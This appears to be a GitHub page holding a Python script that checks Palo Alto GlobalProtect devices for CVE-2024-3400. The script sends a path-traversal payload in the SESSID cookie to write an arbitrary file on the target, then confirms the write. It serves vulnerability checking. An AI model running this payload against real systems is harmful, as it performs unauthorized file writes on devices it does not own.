-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-3400_upload_check.py
54 lines (47 loc) · 2.15 KB
/
CVE-2024-3400_upload_check.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/env python3
#Example taken from https://github.com/h4x0r-dz/CVE-2024-3400
# import requests module
import urllib3
#Disable insecure warnings from invalid SSL certs
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import sys, uuid, requests
#generate random file to test upload capabilities
filename = str(uuid.uuid4()) + ".txt"
def runArbitraryUpload(site):
#Build Headers
Headers = {
"Host":"127.0.0.1",
"Cookie":f"SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{filename};",
"Connection":"close",
"Content-Type":"application/x-www-form-urlencoded",
"Content-Length":"0"
}
exploitResponse = requests.post(f"{site}", headers=Headers)
return exploitResponse.status_code
def getStatus(site):
try:
response = requests.get(f"{site}/global-protect/portal/images/{filename}", verify=False)
return response.status_code
except (requests.exceptions.MissingSchema, requests.exceptions.ConnectionError) as err:
print("Bad URL or missing URL")
exit()
def main():
site = str(input("Enter FQDN or IP to PaloAlto device (Include http:// or https://): ")).lower()
Status=getStatus(site)
if Status == 404:
if str(input(f"Would you like to test arbitrary file uploading to {site}? (Y/n) :") or "N") == "Y":
exploitStatus=runArbitraryUpload(site)
if exploitStatus == 200:
print("no errors from post... Checking successful write")
Status=getStatus(site)
if Status==403 or Status==200:
print("PaloAlto susceptible to CVE-2024-3400 arbitrary file upload")
print(f"you will need to clean up the file located at /var/appweb/sslvpndocs/global-protect/portal/images/{filename}")
else:
print("Exploit unsuccessful, PaloAlto is not susceptible to CVE-2024-3400 arbitrary file upload")
else:
print(f"Unexpected Status code of {exploitStatus} from exploit")
else:
print(f"Unexpected Status code of {Status} from FQDN/IP check")
if __name__ == "__main__":
main()